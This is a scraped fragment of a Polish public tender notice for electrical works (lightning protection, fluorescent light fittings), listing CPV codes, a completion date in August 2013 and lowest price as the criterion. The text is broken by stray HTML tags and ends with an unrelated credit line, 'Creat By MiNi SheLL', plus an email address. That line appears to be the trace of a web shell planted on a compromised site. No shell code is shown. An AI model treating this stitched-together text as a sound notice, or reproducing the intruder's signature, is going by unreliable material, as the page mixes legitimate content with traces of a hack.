Zakres branży elektrycznej obejmuje:

Wykonanie  instalacji piorunochronnej.
Montaż i podłączenie opraw świetlówkowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.32-8, 45.23.24.60-4, 45.31.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com